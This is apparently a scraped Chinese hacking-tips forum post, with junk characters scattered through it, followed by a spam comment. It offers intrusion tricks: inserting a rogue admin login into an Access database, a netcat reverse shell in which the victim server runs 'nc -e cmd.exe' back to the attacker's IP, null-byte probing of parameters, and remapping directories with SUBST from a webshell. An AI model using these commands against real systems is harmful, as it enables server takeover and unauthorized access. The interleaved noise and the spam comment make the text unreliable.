6 k* e6 Y: @5 a7 G1 B5 V知道表名,字段,使用SQL语句在ACCESS数据库中加个用户名及密码语句如下:# p X7 k3 b' t" p, _ N
Insert into admin(user,pwd) values('test','test') ; T* Y; z1 N2 o: W* U7 o) y4 L* p; H" e g9 U& @7 l+ Q: c8 ]
; F) E. P0 n' O! }" u' a! H7 g
NC反弹3 d0 a, h3 V2 ?4 b
先在本机执行: nc -vv -lp 监听的端口 (自己执行) 7 {9 q; K3 n7 x/ V" R
然后在服务器上执行: nc -e cmd.exe 自己的IP 和监听的端口 (对方执行)6 g7 l6 W, J, M. o8 ] F7 K
* I+ B/ ~# P# ~4 s: k. `' W1 _. J" I! O$ G
在脚本入侵过程中要经常常试用%00来确认下参数是否有问题, j# d; g" D% h
2 B1 d7 y& P8 W
有时候我们入侵的时候,在webshell没有办法列举网站的目录包括dir也不行的时候,这个时候可以尝试用DOS命令SUBST转移目录 4 L) t u8 M% V0 T6 F3 N# B0 K4 a+ ]例如: 3 ]1 g( d# v1 tsubst k: d:\www\ 用d盘www目录替代k盘 * w5 T+ E5 O. Lsubst k: /d 解除K盘代替作者: 匿名 时间: 2017-12-20 02:36
We are a group of volunteers and starting a new scheme in our community.
Your web site offered us with valuable information to work on. You've done a formidable job and our entire community will
be grateful to you.
Website: Antispur Duo Forte proprieta